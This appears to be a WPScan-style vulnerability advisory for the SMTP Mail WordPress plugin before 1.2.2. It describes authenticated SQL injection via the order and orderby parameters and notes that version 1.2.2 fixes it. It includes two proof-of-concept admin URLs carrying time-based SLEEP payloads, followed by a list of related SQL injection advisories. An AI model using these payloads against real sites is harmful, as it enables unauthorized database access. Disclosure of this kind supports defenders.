SMTP Mail < 1.2.2 – Authenticated SQL Injections | Plugin Vulnerabilities

Description

The plugin does not properly validate or escape the order and orderby parameters before using them in SQL statements, leading to SQL Injections in the admin dashboard

Proof of Concept

https://example.com/wp-admin/options-general.php?page=smtpmail-setting&tab=list&order=AND+%28SELECT+42+FROM+%28SELECT%28SLEEP%2810%29%29%29b%29
https://example.com/wp-admin/options-general.php?page=smtpmail-setting&tab=list&orderby=subject+AND+(SELECT+42+FROM+(SELECT(SLEEP(10)))b)

Affects Plugins

Fixed in 1.2.2

Classification

Type

SQLI

OWASP top 10

CWE

CVSS

Miscellaneous

Original Researcher

WPScanTeam

Verified

Yes

WPVDB ID

fc50cf1a-00ae-4634-9b96-cbb6ced4651a

Timeline

Publicly Published

2021-08-24 (about 4 years ago)

Added

2021-08-24 (about 4 years ago)

Last Updated

2021-08-24 (about 4 years ago)

Other

Published

Title

Published

2025-05-27

Title

Likes and Dislikes Plugin <= 1.0.0 - Unauthenticated SQL Injection

Published

2021-11-24

Title

Hide My WP < 6.2.4 - Unauthenticated SQL Injection

Published

2014-08-01

Title

TagGator - 'tagid' Parameter SQL Injection

Published

2025-01-17

Title

WordPress Local SEO <= 2.3 - Unauthenticated SQL Injection

Published

2024-11-01

Title

Appointment Booking Calendar Plugin and Scheduling Plugin – BookingPress < 1.1.17 - Authenticated (Subscriber+) SQL Injection